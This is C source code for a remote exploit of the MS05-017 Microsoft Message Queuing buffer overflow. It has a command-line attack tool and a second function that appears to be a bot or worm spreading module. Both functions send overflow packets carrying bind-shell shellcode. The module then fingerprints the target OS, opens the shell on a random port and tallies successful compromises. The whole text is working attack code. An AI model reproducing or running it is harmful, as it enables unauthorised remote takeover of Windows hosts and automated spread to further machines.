int
main (int argc, char **argv)
{
unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
unsigned char *packet = NULL;
unsigned short bindport;
unsigned long cnt;
struct sockaddr_in addr;
struct hostent *he;
int len, cpkt = 1;
int sockfd;
char recvbuf[4096];
char *buff, *ptr;
#ifdef _WIN32
WSADATA wsa;
#endif
printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
if (argc < 5) {
printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
printf("\nMSMQ ports: 2103, 2105, 2107\n");
printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
exit(0);
}
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] create socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons((short)atoi(argv[2]));
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed!\n");
exit(0);
}
printf("OK\n");
packet = dce_rpc_bind(0, endp, 1, &cnt);
if (send(sockfd, packet, cnt, 0) == -1) {
printf("[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 0) {
printf("[-] recv failed\n");
exit(0);
}
free(packet);
printf("[*] Attacking...");
buff = (char *) malloc(4172);
memset(buff, NOP, 4172);
ptr = buff;
memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
ptr += sizeof(dce_rpc_header1)-1;
// Remote NetBIOS name
convert_name(ptr, argv[3]);
ptr += strlen(argv[3])*2;
memcpy(ptr, tag_private, sizeof(tag_private)-1);
ptr += sizeof(tag_private)-1;
memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);
// offsets
ptr = buff;
ptr += 438;
memcpy(ptr, offsets, sizeof(offsets)-1);
ptr += sizeof(offsets)-1;
// shellcode
bindport = (unsigned short)atoi(argv[4]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
buff[4170] = '\0';
buff[4171] = '\0';
if (argc == 6) cpkt = atoi(argv[5]);
while (cpkt--) {
printf(".");
if (send(sockfd, buff, 4172, 0) == -1) {
printf("\n[-] send failed\n");
exit(0);
}
}
printf(" OK\n");
return 0;
}
BOOL MSMQ(EXINFO exinfo)
{
if(!fNetWkstaGetInfo) { return FALSE; }
char* cname;
char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
char *packet = NULL;
unsigned short bindport;
unsigned long cnt;
struct sockaddr_in addr;
int len, cpkt = 1;
int sockfd;
char recvbuf[4096];
char *buff, *ptr;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
return FALSE;
addr.sin_family = AF_INET;
addr.sin_port = fhtons(exinfo.port);
addr.sin_addr.s_addr = finet_addr(exinfo.ip);
memset(&(addr.sin_zero), '\0', 8);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
return FALSE;
packet = dce_rpc_bind(0, endp, 1, &cnt);
if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; }
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 0) { free(packet); return FALSE; }
cname = GetRemoteComputerName(exinfo.ip);
if(strlen(cname) == 0) { return FALSE; }
buff = (char *) malloc(4172);
memset(buff, NOP, 4172);
ptr = buff;
memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
ptr += sizeof(dce_rpc_header1)-1;
msmq_convert_name(ptr, cname);
ptr += strlen(cname)*2;
memcpy(ptr, tag_private, sizeof(tag_private)-1);
ptr += sizeof(tag_private)-1;
memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);
ptr = buff;
ptr += 438;
memcpy(ptr, offsets, sizeof(offsets)-1);
ptr += sizeof(offsets)-1;
int bp = brandom(1337,65535);
bindport = (unsigned short)bp;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
buff[4170] = '\0';
buff[4171] = '\0';
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS == OS_WIN2K) cpkt = 8;
if(TargetOS == OS_WINXP) cpkt = 1;
while (cpkt--) {
if (fsend(sockfd, buff, 4172, 0) == -1) {
return FALSE;
}
}
fclosesocket(sockfd);
Sleep(500);
free(buff);
if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;}
return FALSE;
}
